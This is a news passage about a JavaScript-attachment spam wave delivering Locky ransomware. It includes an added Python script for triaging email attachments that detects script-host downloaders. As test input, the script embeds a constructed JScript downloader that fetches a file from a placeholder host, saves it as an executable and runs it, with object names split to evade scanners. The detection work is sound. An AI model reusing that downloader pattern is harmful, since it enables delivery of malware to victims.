So far, two different companies have reported on this event, ESET and Proofpoint, the latter going as far as calling it one of the biggest spam floods in recent years.
This code typically downloads a second-stage binary and then executes it. For this particular campaign, the criminals' favorite payload is the Locky ransomware. This ransomware variant appeared at the start of the year and has known ties to the Dridex botnet.
In previous spam distribution campaigns, JS-based malicious email attachments also delivered banking trojans and ransomware variants like TeslaCrypt and CryptoWall.
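A mail gateway or SOC analyst wants a quick way to triage such attachments: flag ZIP members Windows would hand to the script host, then look inside the script for the fetch/write/run building blocks a downloader needs. The following is an added example (not code from the article, ESET or Proofpoint); the sample attachments are constructed, and the indicator list is an assumption covering generic Windows Script Host/COM calls, not a signature for any named family. It also folds split string literals (`"MSX" + "ML2.XMLHTTP"`), a common trick for hiding those names from naive scanners.

```python
"""Triage of e-mail attachments for JScript downloaders (added example).

Not the article's, ESET's or Proofpoint's code. Samples are constructed;
the indicator regexes are an assumption: the generic WSH/COM objects a
JavaScript downloader uses to fetch, write and run a payload.
"""
import io
import re
import zipfile

# Extensions wscript.exe/cscript.exe/mshta.exe execute on double-click.
SCRIPT_EXTENSIONS = (".js", ".jse", ".wsf", ".vbs", ".vbe", ".hta")

# Heuristic indicators; ".exec(" will also hit harmless JS regex use, so
# the verdict only escalates when fetch AND run capability are both present.
INDICATORS = {
    "http_client": re.compile(r"MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "file_write": re.compile(r"ADODB\.Stream|Scripting\.FileSystemObject", re.I),
    "shell": re.compile(r"WScript\.Shell|Shell\.Application", re.I),
    "run_call": re.compile(r"\.(?:Run|Exec|ShellExecute)\s*\(", re.I),
}

_CONCAT_DQ = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
_CONCAT_SQ = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def fold_string_concats(src: str) -> str:
    """Join adjacent literal concatenations so split object names become visible."""
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT_DQ.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
        src = _CONCAT_SQ.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), src)
    return src


def script_members(zip_bytes: bytes) -> list:
    """ZIP member names Windows would pass to the script host (double extensions included)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(SCRIPT_EXTENSIONS)]


def script_indicators(source: str) -> list:
    """Indicator names matched in the (de-concatenated) script source, in INDICATORS order."""
    folded = fold_string_concats(source)
    return [name for name, rx in INDICATORS.items() if rx.search(folded)]


def triage_attachment(filename: str, data: bytes) -> dict:
    """Return scripts found, indicators hit and a verdict: clean / quarantine / block."""
    name = filename.lower()
    result = {"attachment": filename, "scripts": [], "indicators": [], "verdict": "clean"}
    if name.endswith(".zip"):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in script_members(data):
                result["scripts"].append(member)
                for ind in script_indicators(zf.read(member).decode("utf-8", "replace")):
                    if ind not in result["indicators"]:
                        result["indicators"].append(ind)
    elif name.endswith(SCRIPT_EXTENSIONS):
        result["scripts"].append(filename)
        result["indicators"] = script_indicators(data.decode("utf-8", "replace"))
    if result["scripts"]:
        # Any script attachment is held; one that can both fetch and run is a downloader.
        has_downloader_shape = {"http_client", "shell"} <= set(result["indicators"])
        result["verdict"] = "block" if has_downloader_shape else "quarantine"
    return result


# Constructed samples: a split-string downloader and a harmless script.
DOWNLOADER_JS = (
    'var h = new ActiveXObject("MSX" + "ML2.XMLHTTP");\n'
    'h.open("GET", "http://example.invalid/payload", false); h.send();\n'
    'var s = new ActiveXObject("ADO" + "DB.Stream"); s.Type = 1; s.Open();\n'
    's.Write(h.responseBody); s.SaveToFile("x.exe", 2);\n'
    'new ActiveXObject("WScript" + ".Shell").Run("x.exe");\n'
)
BENIGN_JS = "function total(a, b) { return a + b; }\n"


def build_sample_zip(member: str, body: str) -> bytes:
    """Build an in-memory ZIP holding one script member (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, body)
    return buf.getvalue()


if __name__ == "__main__":
    samples = [
        ("invoice_0412.zip", build_sample_zip("invoice_0412.pdf.js", DOWNLOADER_JS)),
        ("helper.zip", build_sample_zip("helper.js", BENIGN_JS)),
        ("scan.pdf", b"%PDF-1.4 constructed placeholder"),
    ]
    for fn, blob in samples:
        print(triage_attachment(fn, blob))
```

The double-extension check matters because a member named `invoice.pdf.js` still ends in `.js` and is run by the script host; the string folding matters because the object names are otherwise trivially hidden from a plain regex. Treat the indicator list as a starting point to tune against your own mail flow.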
Spam wave hit Europe the hardest
For this most recent campaign, Proofpoint said it saw an uptick in spam email originating from Indian and Vietnamese IP addresses. ESET said the wave targeted European countries, and that the crooks did not deliver Locky directly but used the JS/Danger.ScriptAttachment downloader as an intermediary stage.